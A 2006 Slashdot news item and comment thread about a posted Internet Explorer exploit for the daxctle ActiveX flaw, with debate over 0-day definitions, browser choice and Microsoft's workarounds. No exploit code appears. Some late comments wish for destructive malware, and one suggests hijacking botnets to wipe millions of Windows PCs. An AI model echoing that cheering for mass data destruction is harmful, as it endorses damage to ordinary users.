Code Posted For New IE Exploit

PC World is reporting that two days ago hackers posted code for a new vulnerability in Internet Explorer that could allow drive-by takeover of a vulnerable PC. Security companies say that no exploits using the "daxctle" vulnerability have yet been found in the wild, but they are taking the new threat seriously. Symantec calls the bug "critical" and Secunia rates it highly critical, the most severe rating. The hackers who posted the sample code, xsec.org, refer to it as a "0day" exploit. The article quotes another security expert who calls this label "a stretch." Update: 09/17 18:00 GMT by C :Fixed link to XSec. Thanks for pointing that one out, folks.

Wrong Link in Subject

That's xsec.org not xsec.com

Re:Wrong Link in Subject

[WilliamSChips]

What does the goatsecant of x have to do with anything?

Re:Wrong Link in Subject

Rather, that is now goatse.ca, not goatse.cx, as the latter has been suspended by the .cx folks.

ZOMG IE EXPLOIT, MUST BE A DUPE?!?

Or maybe not... in any case, here is the patch:

Re:ZOMG IE EXPLOIT, MUST BE A DUPE?!?

[CRCulver]

Funny you use Emacs-W3M in your "IE alternative" joke. It was recently removed from Gentoo because it is unmaintained and may not work with future versions of Emacs.

Re:ZOMG IE EXPLOIT, MUST BE A DUPE?!?

> Funny you use Emacs-W3M in your "IE alternative" joke.

What's funny about that? I suppose you need a sense of humor to use Emacs instead of vim?

Re:ZOMG IE EXPLOIT, MUST BE A DUPE?!?

That's not a patch, it's a replacement. And a poor one too.

Re:ZOMG IE EXPLOIT, MUST BE A DUPE?!?

[Bing+Tsher+E]

What the hell is this 'vim' crap? vi is a 30K binary on my system (NetBSD) not some bloated third-party clone.

Another bloody ActiveX exploit

These ActiveX exploits are driving me nuts. I don't use IE (thank God), but I'm still willing to supply the feathers if someone else will get the tar.

Moo

[Chacham]

Another ActiveX exploit. *yawn*

If you want to be safe in IE, turn off ActiveX from untrusted sites. Hasn't this been known since day one?

News would be if ActiveX was tested and found to be safe.

Re:Moo

[cubicledrone]

Oh noes! Don't criticize teh billywindows! The PC Magazine fanzorz will moderate troll troll troll.

Ah yes. PC Magazine. Where Macs don't exist and "power-hungry" appears in every third headline.

Re:Moo

[dvice_null]

There has bee reports about trusted sites being hacked and spyware/viruses being planted on them. So there really isn't a thing called "trusted site". So if you want to be safe in IE, switch to Linux. If you want to be almost safe in IE, don't use it. I recommend Firefox instead.

Re:Moo

[Bing+Tsher+E]

Well, to be fair, PCs only exist as limp parodies of the real thing in MacWorld and other Mac-only publications.

Re:Moo

[vhogemann]

A better alternative would be not use IE at all.

I know most users just don't care, or don't know better. But what about developers and companies? These should be treating IE like a plague, and using it only when there's no other suitable alternatives, on a sandboxed environment.

I used to care about IE compatibility when I designed my pages... but not anymore. I realized that most business already expect some kind of requirements for the software you sell or build for them, mine is a modern browser, with decent CSS support. They even have choices, Firefox, Mozilla, Konquerror, Safari or Opera.

ActiveX should be dead and burried by now. It's broken beyond any possible fix, Microsoft should be required to fix it, or remove it from Windows.

Re:Moo

[trezor]

Switch to Linux and watch all my applications which I need to do my job fail. Yes, that sounds like a plan. For the record I'm a .NET developer who needs Visual Studio and SQL Server to do my work.

You may find it hard to believe but Windows is a pretty damn secure OS, given that the one using it knows what he's doing. I'm not using MSIE, I'm not using Windows Media Player. And I have yet to have my machine BSOD, get infected with spyware/virus nor have to reinstall it periodically because it's unresponsive. My system is working excellently and does what I want it to do, and does it better than any Linux setup I can come up with.

Making people believe they are "secure" only by switching to another OS is stupid at best. If people don't know how their systems work, you can be sure as hell they wont be able to secure it. There is no system that is more secure than it's admin is competent.

Fine, you use Linux, it works for you. Congratulations on that! But branding it as a universal solution is just stupid.

Re:Moo

[Chacham]

ActiveX should be dead and burried by now.

Perhaps you mean ActiveX on untrusted sites. On an intranet especially, or certain trusted sites, it can be invaluable.

Re:Moo

I wish one could do that, but plain ignoring 75% of internet users is fucking stupid. NO sane business would choose that. And there's countless businesses that use Windows/IE exclusively for their intranet (if you meant when designing "intranet" web sites or such), and for them there isn't a whole lot more choice. Mostly Firefox or Opera. And in both cases, that still means they have to install/deploy a new app to tons of PCs and maintain/update/patch it - one more hassle - and a totally uncessary one at that - for every already overworked IT dept. I don't design for IE (I don't even take it in consideration), but before I "ship", it's made to work with IE at least half-decently.

IE sucks _very_badly_ (v7 included), but willingly ignoring the largest user base in the world (and not saving very much work either)? That's called idiocy. Anybody with a head on their shoulders will do the extra 0.1% work and have it work with everything out there.

Re:Moo

[Millenniumman]

I'm sorry, but you're wrong. Linux is much more secure for most users. If you can't install the OS, and use it, you won't have any security problems.

Re:Moo

[NoTheory]

yes, and you can reduce your risk of car accidents by moving into the middle of the sahara desert. The statement may be true, but it's not very useful. As for grandparent, so you develop w/ .NET, that's great for you too. I believe that VS is in the WINE list of apps. You've picked your platform, but that doesn't mean that you've got rock-solid justification for it. Ultimately the platform you pick is about your laziness, and what you want to be lazy about.

Re:Moo

[kula.shinoda]

That wouldn't be news, it would be fud :)

Re:Moo

[Reaperducer]

I have yet to have my machine BSOD, get infected with spyware/virus nor have to reinstall it periodically because it's unresponsive. My system is working excellently and does what I want it to do

That's great. But what if you want to use it on day two?

Re:Moo

[Reaperducer]

Strawman!! Strawman!!

Sorry... I got carried away there. Everyone else on Slashdot misuses that term. I didn't want to feel left out.

Re:Moo

[x2A]

...and instead use one of the many other browsers that never has any bugs 'n exploits, like erm... errr... um... anyway, yeah, then you'd be totally secure!

Semantics but..

A '0day exploit' is remarking on how recent it is, not the security factor. If it's real recent then it's 0day. No idea why a 'security expert' would call that a 'stretch'.

Re:Semantics but..

[n0-0p]

A 0-day refers to an undisclosed vulnerability; however, some people have stretched the definition to mean unpatched vulnerability. It's considered a stretch because an unpatched vulnerability is still known, so precautions can be taken. With a true 0-day vulnerability/exploit, you would have no knowledge of the issue and no way of protecting specifically against it.

Re:Semantics but..

[mattpalmer1086]

No, 0-day refers to an exploit that is released the same day as the vulnerability it exploits is announced. If the vulnerability hasn't been announced at all, it's not a 0-day exploit.

Since /.'s already turned into bugtraq...

[mobby_6kl]

why not post these:

Linux Kernel SMBFS CHRoot Security Restriction Bypass
Linux Kernel SCTP Multiple Remote Denial of Service
Apple Mac OS X KExtLoad Format String Weakness
Mozilla Firefox JavaScript Handler Race Condition Memory Corruption Vulnerability

Re:Since /.'s already turned into bugtraq...

[Kangie]

Because that would be like cheating at Roulette. We don't need stuff like that. This IS news for nerds, right? Only geeks need exploits.

Re:Since /.'s already turned into bugtraq...

[elronxenu]

Perhaps because the first bug you mentioned was posted 4 months ago, you can resolve it by upgrading your kernel, and almost nobody would run an application chrooted under an SMBFS network filesystem anyway.

The second bug is only a DOS, it won't give an attacker sweet r00t permissions. And it's also 4 months old news.

The third bug doesn't result in any privilege escalation because the kextload program isn't setuid, you'd need to find some other vulnerability in a program which uses kextload.

And the fourth bug is a month old already, hasn't been proven to be exploitable (more likely to simply crash firefox), and is easily resolved by upgrading firefox.

Re:Since /.'s already turned into bugtraq...

[Mixel]

Okay, one of my few attempts to be funny... and I totally fuck up. Figures. I hate sensitive trackpads. Won't be trying this again for a while.

Re:Since /.'s already turned into bugtraq...

[Bing+Tsher+E]

You won't be trying what? Posting off-topic side comments with your +2 enabled? You just did it twice in a row.

People: check on 'No Karma Bonus' when posting side comments. Your every word does NOT warrant being made at +2.

Re:Since /.'s already turned into bugtraq...

It was not even slightly funny, it was something an 8 year old kid would say, grow up.

Re:Since /.'s already turned into bugtraq...

[Mixel]

People: check on 'No Karma Bonus' when posting side comments. Your every word does NOT warrant being made at +2.

First post was a premature accident. My second post was +1, but then modded +2 'Underrated'. Which is a strange, but some slashdotters are apparently very kind and are happily to forgive me for my sillyness.

Re:Since /.'s already turned into bugtraq...

Well, the joke's on the original poster cause I saw the mod +4 funny and decided to post my reply anyway. The original comment wasn't funny and is indistinguishable from a Windows fanboy whining that Linux and related bugs are underreported. Somebody who is clueless might think the 4 mentioned bugs constitute some serious problem in Linux (or MacOSX) which hasn't been addressed by the developers. All I did was point out that those bugs are not serious, were addressed, and in all but one case, are not "news".

Re:Since /.'s already turned into bugtraq...

[Fyre2012]

...but some slashdotters are apparently very kind...

Wow... for a second had to double check my address bar to make sure I was still on slashdot.

Re:Since /.'s already turned into bugtraq...

[Millenniumman]

You're merely jealous that you don't have excellent karma. :D

Re:Since /.'s already turned into bugtraq...

[Bing+Tsher+E]

bullshit. there's a setting in the preferences to default your comments to 1, and turn off the +1 for 'karma'.

(and you thought you were gonna bait me into using the +1 to reply to your troll, huh?)

September 13, not September 15

[Infosec+Geek]

Since this was dated September 17, make that four days ago, not two.

Check the date on the xsec.org page referred to, daxctle2.c. milw0rm 2358 was a re-publication of this, also posted up on 09/13/2006. Republication happened at other exploit advisory sites as well, such as the SecuriTeam(TM) site, where, for some strange reason, the exploit was published twice, redundantly.

The formal vulnerability advisories SA21910 and FrSIRT/ADV-2006-3593, from Secunia and FrSIRT respectively, posted on 09/14/2006, confirmed and extended this, since both groups developed internal versions of daxctle2.c which were reliably effective in compromising fully patched instances of IE6.0 on WXPSP2.

However, both these advisories made it clear that the root cause flaw was in the ActiveX component that was so successfully and famously attacked by HD Moore in July.

Friday's MS advisory, Microsoft Security Advisory (925444), both clarified matters and proposed two workarounds that might be of more use than shutting down ActiveX or fervent prayer, namely:

1. Disable just the DirectAnimation Path ActiveX Control in the Registry, or
2. Modify the ACL of the actual file Daxctle.ocx to be more restrictive.

Assuming, of course, that one considers it wise to use MSIE at all, given a choice. But PHBs from coast to coast have left many millions of cube inmates with exactly that: no choice.

Re:September 13, not September 15

[RAMMS+EIN]

``the exploit was published twice, redundantly''

And you are repeating yourself, twice, redundantly, saying the same thing multiple times without adding new information. ;-)

Re:September 13, not September 15

[Technician]

Assuming, of course, that one considers it wise to use MSIE at all, given a choice. But PHBs from coast to coast have left many millions of cube inmates with exactly that: no choice.

Many of us cube inmates use IE as required internaly as required. On break, we re-boot into a live Linex CD and are unable to log into the corp domain, but happly point firefox at the corp autoproxy and surf away.
It is safe for the corp as nothing is saved to disk. I love Ubuntu for this.

Firefox 1.5.07?

[jiushao]

Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit? These stories about IE exploits comes off as pure Microsoft-hate masturbation.

Re:Firefox 1.5.07?

[makomk]

Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit?

Key word: fixing. As far as I can tell, this security hole is currently unpatched.

Re:Firefox 1.5.07?

[Pecisk]

Propably because there is code in the wild for this exploit and bug itself is still unfixed?

Re:Firefox 1.5.07?

There was a critical RSA vuln and some contrived spoofing attack which requires the user to accept a self signed cert (without manually checking) after someone has intercepted their DNS requests. The other vulns, like most web browser exploits require javascript. The real story is how web 2.0 (tm) is being built on an insecure technology that people are foolish to leave enabled in any browser.

Re:Firefox 1.5.07?

[jiushao]

Granted, now they are fixed, but the exploits were known for at least several days before the update was made available (and another few days before the automatic updates picks up on it). Similiarly we can probably expect a Microsoft patch within a week (as has been the typical delay for more critical problems for some time, granted, the WMF exploit took 9 days, but that unfortunately happened during the holidays).

Re:Firefox 1.5.07?

[Vexorian]

So you are saying that just to avoid people like you to call slashdot a ms-hate central, slashdot should avoid to publish an story about a new IE exploit even though it is news for nerds and stuff that matters?

Boy , you must accept that this news item wasn't biased, it didn't come with the standard "It seems that MS screwed it again" nor any other POV , and the exploit does exist. So why get so offended?"

Re:Firefox 1.5.07?

[RonnyJ]

The presence of this news item doesn't show bias.

However, I would suggest that the lack of news items regarding security flaws in Firefox does show bias.

Re:Firefox 1.5.07?

[Wylfing]

Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit? These stories about IE exploits comes off as pure Microsoft-hate masturbation.

OK, smarty, I will explain the difference to you. On one hand we have Firefox, which is a piece of software that is free in both senses, and you can use it, or not use it, or delete from your system, or whatever you want. On the other hand we have Internet Explorer, which is forced upon you via "leveraging," you cannot remove, and you must use because of contrived tie-ins to fundamental system functions.

If there is an exploit for Firefox, I can shrug my shoulders and use any of a dozen other browsers to look at web pages until it gets fixed. Or I can choose to continue using Firefox anyway, despite the risk. It's my choice. However, if there is an exploit in Internet Explorer, I am just plain screwed. I can't switch the goddamn thing off or remove it. Hell, there are plenty of applications and services that will gleefully launch IE of their own accord and start loading internets from God knows where, and there's no way for me to stop it. Because of Microsoft's predatory practices, I have no choice in the matter (except to abandon Windows altogether, which is also not an option -- see how all my choices have been removed?). You're damn right people are a lot more upset when exploits turn up in IE. We are required to suffer the fallout from them.

Re:Firefox 1.5.07?

Wait, so, what you're saying is that bugs in Firefox are OK, because you can use another browser.

Correct me if I'm wrong, but if you're using Firefox, then you're using a browser other than Internet Explorer, right? So apparently you don't have to use Internet Explorer.

In fact, you can change the default browser on the system (Firefox will do this automatically for you at that), causing other applications to open up Firefox instead of Internet Explorer when they need a web browser.

I fail to see how you don't have a choice but to use Internet Explorer, especially when apparently you've decided to not use Internet Explorer. I know I have no problem using Firefox or Opera under Windows. Apparently you really can choose not to use Internet Explorer!

Re:Firefox 1.5.07?

[RonnyJ]

You didn't actually address anything of the issue raised about Slashdot covering IE security issues more than Firefox issues, instead you went off on a wild tangent about how IE is integrated into the system.

Sure, you can talk all you like about Firefox and other browsers being optional, etc., but that's not the issue being raised.

Re:Firefox 1.5.07?

[Bing+Tsher+E]

No, I think he is saying that articles like this shouldn't be of much interest to the Slashdot community, since we're not stuck using IE. All these topics are for is to poke fun at Microsoft.

I don't agree that this is the only reason the articles are published (for one thing, Slashdot is stacked with people who claim to be OSS-advocates who are probably browsing the site on their Mom's computer running Win Me and they get sent to their room if they install anything they downloaded on it).

Re:Firefox 1.5.07?

[RonnyJ]

That's contrary to what the second line in the summary says, though you've still been modded up despite posting no evidence to back your claim up.

Security companies say that no exploits using the "daxctle" vulnerability have yet been found in the wild

Re:Firefox 1.5.07?

[cloudmaster]

Someone else already mentioned that Firefox bugs actually get *fixed*, and often don't have exploits available until after they're disclosed.

This bug is with a required piece of system software that you can't turn off, *and* it's not fixed yet, *and* there is a working exploit available. If you can think of other similar situations that aren't reported, please, feel free to submit them. Otherwise, your apples don't belong in this orange tree.

Re:Firefox 1.5.07?

[Hercules+Peanut]

Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit? These stories about IE exploits comes off as pure Microsoft-hate masturbation.

I don't know, perhaps because they were fixed??

Re:Firefox 1.5.07?

RTFM.
IE cant be removed.
IE is not only used for web browsing purposes, but started and used for and by quite a many applications.
How's the Windows Update doing without IE ?

Re:Firefox 1.5.07?

[ultranova]

You didn't actually address anything of the issue raised about Slashdot covering IE security issues more than Firefox issues, instead you went off on a wild tangent about how IE is integrated into the system.

Slashdot covers IE security issues more often than Firefox security issues because IE gets new exploits much more often than Firefox, and since IE is used in a lot more machines than Firefox, IE security issues have far more potential for destruction than Firefox security issues, making them more newsworthy.

It's a bit like why forest fires in Amazon jungles get reported more often than forest fires in Antarctica.

Re:Firefox 1.5.07?

[jiushao]

Sure, after a week of them being public knowledge (a few days for the fix to turn into a release, another few for the release to get out the door), which, coincidentally, is largely the same turnaround that Microsoft has had on serious flaws as of late.

Re:Firefox 1.5.07?

[suv4x4]

If there is an exploit for Firefox, I can shrug my shoulders and use any of a dozen other browsers to look at web pages until it gets fixed. Or I can choose to continue using Firefox anyway, despite the risk. It's my choice. However, if there is an exploit in Internet Explorer, I am just plain screwed. I can't switch the goddamn thing off or remove it.

I'm getting tired of explainint this, but here we go again: do you notice the shiny E on your desktop? This is IE. Now, if you're thinking of double clicking it and visiting sites, then perform the following steps not to use IE:

1. do not double-click the blue E.

Wish you good luck!

Re:Firefox 1.5.07?

[isorox]

Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical...

Because the first I, and many or most firefox users, heard about the bugs, was when Firefox told me that a bug fix was waiting to be installed. By the time I got to slashdot, it wasn't news, or a threat.

Re:Firefox 1.5.07?

No I watch this site fairly much every day. Dozens AND dozens of 'Microsoft did XYZ OMG IT IS THE BAD'. It happens in some sort of open source software and sits unfixed for YEARS (which is the case for some firefox issues btw) and its 'oh well least its not microsoft'.

Also FF is gaining traction it HAS some decent marketshare. On this site it is nearly 75% usage 10-15 other places. Yet coverage is slanted towards IE. A bad FF bug gets my attention much quicker than an IE one these days.

And using your analogy we are in antarctica...

Re:Firefox 1.5.07?

[AmberBlackCat]

I don't know. I've been running Windows with Internet Explorer ever since I was playing with dolls and I've never had my system compromised by any browser exploit. I think all the people who defend Firefox and Linux by saying "this is pure fud" are just as likely to spew their own "fud".

Re:Firefox 1.5.07?

[archen]

Although you cannot remove IE you can secure your system then choose not to use IE. If you turn on content advisor then only allow windowsupdate.com you can block pretty much all IE internet access (in theory). You can then remove IE in add-remove programs which just deletes all the icons to IE - can still be launched through iexplore though. Lastly if you want to manually use windows update, create an mmc snap in pointing there.

Re:Firefox 1.5.07?

To keep from IE just loading "internets" from "god knows where", just set an invalid proxy up.

Not much HTTP going over port 7891 with address of FAKEPROXY.

Re:Eh?

[LaughingCoder]

OK, I'll answer the question. About 75% of web users still use IE.

If you are a sys admin, or a web admin, Deal.

"not a 0day exploit"

[wfberg]

The reason it's not a 0day exploit is because some other dude already discovered the vulnerability, but didn't disclose it to the public? And that second guy is sitting on another 3 or 4 vulnerabilities?

I'm sorry, what's the definition of 0day exploit these days? If not exploit code for which there is no patch available, then what?

Can we now use "responsible disclosure" to argue away the fact that actual computer systems are at risk of being exploited right here and now, by saying "yeah, well, you got rooted and all, but we knew about that bug, so it doesn't count, even though we don't have a patch yet."?

Can we now take comments that the programmers left in the code ("// does this work?" "/* coded while druk */" "//BUGBUG") as an excuse to completely ignore actual vulnerabilities?

And hey, if TWO researches come up with this vulnerability seemingly independently, what are the chances of the exploit already circulating in the black hat community? Close to 100%?

By my definition you've got your negative-day and your zero-day exploits. Negative-day exploits; no patch yet. Zero-day; the patch has just been issued, so might as well give your exploit to scriptkiddies and botnet operators to use on the systems that don't patch early/often enough. Obviously, a negative-day exploit usually isn't going to be used on a large scale, because your average blackhatter wants to keep it in his toolkit to attack well-patched systems; after all, it's what gives him (and his leet skillz) an edge. Once patchday arrives, you might as well give it to some noobs, because they might be interested in unpatched targets, while a leet blackhatter is not.

So no, it's not a "stretch" to call it 0day. It's negative day, even.

Re:"not a 0day exploit"

[n0-0p]

I think your definition of zero day is ops-centric, and not security-centric. In this post I give the generally accepted definition in the security community, which agrees with Moore's statement. To summarize, the security community only uses 0-day to refer to undisclosed vulnerabilities, and it does not address patch lag.

Re:"not a 0day exploit"

[wfberg]

Undisclosed to whom? The second guy seemed to be sitting on the vulnerability. He might've disclosed to Microsoft, but has the public learned of this vulnerability before? If not, they can't be taking any precautions.

Re:"not a 0day exploit"

[n0-0p]

I assumed the qualifier was understood; I meant publicly disclosed, not just disclosed to the vendor. Also, I'm not sure if you're familiar with how disclosure works, but it's not in Moore's best interests reveal that he's sitting on vulnerabilities unless he intends to disclose them soon. So he may be practicing responsible disclosure and allowing the vendor a reasonable amount of time to complete a patch. Or he may have other reasons for waiting.

Security disclosure in general is a pretty complicated game of posturing and politicking. At its best it can be a genuinely altruistic form of public service. At its worst it's extortion scams and weapons trafficking.

Re:"not a 0day exploit"

[wfberg]

I assumed the qualifier was understood; I meant publicly disclosed, not just disclosed to the vendor. Also, I'm not sure if you're familiar with how disclosure works, but it's not in Moore's best interests reveal that he's sitting on vulnerabilities unless he intends to disclose them soon.

In this case, it seems like disclosure isn't working - particularly "responsible" disclosure. Otherwise no one would be reporting vulnerabilities that others *claim* are already known (by whom? not the guy claiming the 0day).

Re:"not a 0day exploit"

[edxwelch]

You're right it *is* a zero day exploit. There have been quite a lot of them reciently, but they haven't done much damage because they depend on the user to navigate to a malicious web site with IE and activeX switched on.
What would really be a lot of fun is a Blaster-type zero day worm.
(If you remember blaster only required the user to connect to the internet to be infected)

Re:"not a 0day exploit"

[spinja]

The reason I don't consider it "0day" is that a public tool exists that will discover this bug in its default configuration (AxMan). Anyone who took the time could run the tool, discover the bug, and write the exploit. The tool was released on August 1st and this particular bug was reported to Microsoft in late July. Since all of this information was *widely* publicized at the time of release ( a couple dozen articles on AxMan ), I have hard time considering any of the bugs it turns up "0day" in the normal sense. We need a new term, but "negative day" probably isn't it either. The remaining 3-4 easily exploitable bugs (of the ~100 or so that were never included in the Month of Browser Bugs) will likely stay unpublished until a patch is available.

Its funny to see how releasing an exploit accelerates patch development. I have been waiting on the Spline and KeyFrame patches for over a month already, but it wasn't until the xsec guy rediscovered these that Microsoft decided to release a patch. Maybe there is something to this "full-disclosure" thing after all =)

-HD

Make sure to post expoits from other platfoms too

...otherwise the Microsoft appologists will have to do it.

Does not affect IE7

[I'm+Don+Giovanni]

This does not affect IE7:
http://blogs.msdn.com/ie/archive/2006/09/15/756736 .aspx

(Just for edification. ;-))

Re:Does not affect IE7

[rs232]

Yea, by disabling ActiveX and removing Direct Animation. But does that actually fix the defects in the controls themselves.

Re:Does not affect IE7

[The+MAZZTer]

I tried a bunch of ActiveX vulnerabilities for IE6 in IE7. Some didn't even work in IE6 (probably because I didn't have Office or some other MS ActiveX controls). Only 2 out of 15-20 worked in IE7.

winpologists out in force

[rs232]

Slashdot has done stories on bugs in Firefox. See ..

Slashdot | 611 Defects, 71 Vulnerabilities Found In Firefox

Firefox Analyzed for Bugs by Software

Spyware Disguises Itself as Firefox Extension

I'v also noticed how the same kind of comments from the Winpologists get modded up very quickly.

was Re:Firefox 1.5.07?

Re:winpologists out in force

[jiushao]

There is no apologizing for exploits, it is bad whoever has them. On the other hand the nature of the last round of exploits in Firefox is rather really interesting, and as such newsworthy. The cryptographic signature exploit especially warrants a rather interesting technical discussion.

Re:winpologists out in force

[rs232]

Yea, "On the other hand .." lets not talk about bugs in IEXPlorer.

IE

[DragonTHC]

do people still use IE? I thought that was a thing that went out with all your base and peanut butter jelly time!

Re:Eh?

[Vexorian]

90% actually. Yeah, mod redundant please

vulnerability??

[azman075918]

I'm new here. Just want to add my comment about vulnerability. I think most of the user world wide doesnt even care about vulnerability in IE. Only some of the user that are really care about this are taking action such as patching or reporting of the velnerability. All their know is just the IE can run as it suppose to be. Some says that using Firefoq is good but if the user dont even updated, there are also vulnerability there. I still remember one of my friend doesnt even know that his pc has already been take over by someone else. I think the most important think is all the user must alert. That all..

Re:vulnerability??

[dvice_null]

That's why Firefox has autoupdate. People who even don't know what a security update is, are getting updated automatically and usually within a day or two from the security release. (I have seen questions in Firefox supports forums from people who are asking what was that update thing all about they saw, which should be a proof about people getting updated, whether they understand or not. ).

Re:vulnerability??

[gigne]

Welcome to Slashdot. Prepare to spend lots of time reading meaningless articles such as these.

As for your comment... No, users don't care as long as it works. Most people I know with ie as their main browser have all kinds of crap installed. Those annoying toolbars, flashing smileys, and popups all over the place. There is no educating these people, as they don't care to be educated. They see the windows box as a magic device that "should just work" regardless of how reckless they are with their browsing habits.

Um... I don't really know where I am going with this comment, but your point that the user must be alert is a moot point. Users don't care enough to be interested in these alerts, and presented with this information wouldn't care to do anything about it. I guess it is ultimately MS's problem, and they should fix it. If users are too ignorant to get the latest patches, then more fool them.

how to detect an untrusted site ..

[rs232]

"if you want to be safe in IE, turn off ActiveX from untrusted sites"

How do you know what is or is not an untrusted site.

How in any way is that comment "insightful".

Re:how to detect an untrusted site ..

[SLi]

Huh? If you don't have any specific reason to trust it, it's untrusted. I would have thunk that's Internet 101.

Re:how to detect an untrusted site ..

If you don't have any specific reason to trust it, it's untrusted.

What the parent is probably wondering is about the bolded part above and when there's a reason to trust something or not.

I can understand the commment -- when a web browser requires the user to know when something is trusted or not and when to enable an inherently insecure mechanism in the browser or not, something is broken. That's why competitive browsers don't want to support ActiveX in the first place, as they don't want to put that burden on the user. As for e.g. money transactions and that kind of "trust", one can simply check if it's a well-known credit card company managing the transactions over an encryption or not, but as for ActiveX, any site can use it and claim it's for proper functoining of the site.

Re:how to detect an untrusted site ..

[Tim+C]

How do you know what is or is not an untrusted site.

That's easy. If you have to ask yourself "do I trust this site?" then the answer is no.

Re:how to detect an untrusted site ..

[jonadab]

All sites by default are untrusted sites. The system administrator can add specific sites (e.g., the corporate intranet) as trusted, and then those sites can use ActiveX, but you should NOT have ActiveX enabled for random sites on the internet. That would be very unsafe.

IE Vulnerability Attack by '0day'

[IT074859]

The codes posed by the hacker will not affect the IE Version 7. The 'Oday' meaning an exploit for a previously undisclosed vulnerability. According to HD Moore, the head of the Metasploit project, he wrote an automated ActiveX testing tool called AxMan that uncovered a handful of IE bugs, including the one exploited by on xsec.org. The trouble affects users running IE 6 with Service Pack 1 on the Windows XP operating system running Service Pack 1 or the Windows 2000 operating system with Service Pack 4. The problem occurs when visiting a Web site that uses a Web coding standard, HTTP 1.1, and compression according to Micorsoft. The details are shown below: *Vulnerability Identifier: CVE-2006-4777 *Risk: Critical *Affected Software: 1)Microsoft Internet Explorer 6 (Microsoft Windows XP Service Pack 2) 2)Microsoft Internet Explorer 6 Service Pack 1 (Microsoft Windows 2000 Service Pack 4) *Description: The attack on the IE is due to because there has been memory corruption error occured when processing a specially crafted HTML file containing an out-of-bounds value passed to the KeyFrame() method of a DirectAnimation.PathControl ActiveX object (daxctle.ocx). It can be exploited by a remote malicious user to either crash a vulnerable browser through denial of service (DoS) attacks or take complete control of an affected system through arbitrary code execution. This attack on IE vulnerability is due to ONE thing only which is the ActiveX again....Previously the big issues was the IE Version 6 that was suddenly crash. So, now the worst nightmare comes to haunt us back..

Re:IE Vulnerability Attack by '0day'

[udippel]

New here ?

In case you don't know, there's a Preview Button and 'Plain Old Text' if you don't happen to know HTML.

Re:fux0r3d

[rolandog]

In capitalist America, your computer can have 'safe sex' by using the Firefox condom and taking the 'NoScript' pill.

Real Damage

[nurb432]

what ever happened to exploits ( be it virus, trojan, whatever ) that cased some REAL damage?

All this whimy-ass 'botnet' garbage needs to end. We need something that totally kills windows when you get infected. Get the people pissed off enough to force microsoft into doing something.

Re:Real Damage

[(H)elix1]

what ever happened to exploits ( be it virus, trojan, whatever ) that cased some REAL damage?

3. Profit. Folks found there was money to be made off of a bot net under your control. Not uncommon to see an infected system patch itself so others can't infect the system.

Re:Real Damage

[owlstead]

"All this whimy-ass 'botnet' garbage needs to end. We need something that totally kills windows when you get infected. Get the people pissed off enough to force microsoft into doing something."

Stop nagging and start typing.

Re:Real Damage

[nurb432]

Sorry, but too much risk. One thing about growing old is you leave that sort of risk taking to the new kids..

Re:Yes, this affects IE7 but you are prompted

[Psykechan]

Your link points out that IE7 is vulnerable but it will prompt you to run the ActiveX control before hosing your system. From the average user's point of view, they get a message asking to run something created and signed by Microsoft for the page to load. Tell me how many average users, even the relatively computer saavy, will allow the control to run?

Throwing a constant barrage of OS/browser security pop-ups on the screen does not make it secure. Making it so that at exploitable control can be completely removed and not just "effectively removed" from the system helps make the system more secure but this is just a workaround. If the control was designed to be able to grant system level privileges to a web page than it's time to go back to the proverbial drawing board.

If it wasn't designed that way, then patch it when you first hear about it over a month ago and stop complaining about people releasing it to the public. I would rather have everyone know about it than have just Microsoft, a few security people, and several black hats knowing.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Since when is 0-day open to interpretation?

[shaitand]

Either they released the exploit code before the hole was patched or not.

Re:kills windows

[canuck57]

All this whimy-ass 'botnet' garbage needs to end. We need something that totally kills windows when you get infected. Get the people pissed off enough to force microsoft into doing something.

I for one am actually surprised this hasn't happened yet. Say a worm that infects 20 others then formats the hard drive. Or perhaps break into a botnet (they are not that secure) and wipe some millions of Windows PCs at once. It would not be hard to do, let your Windows get infected, figure out how they control it and go off and get control. Time will tell, but I suspect sooner or later someone is going to do it.

I expect the performance of the internet will be greatly improved the next day.

One thing I don't understant...

[RobertM1968]

...Is why these exploits and vulnerabilities are labelled "new".

They aren't new. Maybe they have just been found, but on a product that's been out so long, the exploits have been too (unless of course they were introduced by a fix or update recently). I know it's just improper usage of the English language - kinda like the "new" planets we've found (that have been around for billions of years).

The problem is, this creates a misconception in the casual user's mind as they think the exploit is new instead of just discovered.

Re:One thing I don't understant...

[VGPowerlord]

English is known for having more than one meaning for any given word. For example, here's the first two definitions of new from Merriam-Webster.

1 : having recently come into existence : RECENT, MODERN
2 a (1) : having been seen, used, or known for a short time : NOVEL <rice was a new crop for the area> (2) : UNFAMILIAR <visit new places> b : being other than the former or old <a steady flow of new money>

There's several other definitions for new on the same page.

Re:One thing I don't understant...

[RobertM1968]

True - but those are all context based. By definition (whichever you choose) the proper wording would be new(ly) found exploits, et al - as in the definitions you cited, there are modifiers such as "new crop " for the area" and "visit new places" is based off the perspective of who it is targeted towards (visiting New York might be visiting a new place to you, but not to me). The same with "a steady flow of new money" which is also based off the perspective of who the new money is flowing to/from.

We all know there are a plethora of not-yet-found exploits in Windows. They aren't new, nor are they new in any perspective related to me or my computer experience (or lack thereof). Hence my point... the wording most widely used is misleading while "newly found vulnerability" would be more accurate in both portraying that the exploit has existed for quite some time, and that it has just been found.

I just believe a more accurate portrayal is needed when it comes to computers and related things so that those who are not quite that computer saavy dont get misconceptions about what is really going on.

This is kind of akin to stretching the definition of "Genuine" in an earlier post regarding MS' usage of the word.

That RSA exploit probably appears elsewhere...

[tjwhaynes]

On the other hand the nature of the last round of exploits in Firefox is rather really interesting, and as such newsworthy. The cryptographic signature exploit especially warrants a rather interesting technical discussion.

If you are interested in the work on RSA signatures, check out this OpenPGP posting. The chances are that there are other RSA signature implementations out there that are vulnerable to this sort of subversion and it will be interesting to see what other products actually publish fixes and acknowledge the flaw.

Cheers,
Toby Haynes

Profit

[nurb432]

There has to be some evil person out there that hasnt sold out to the man... In my day, it was the challenge of doing someting that drove us, not the recognition.. ( be it money or peers )

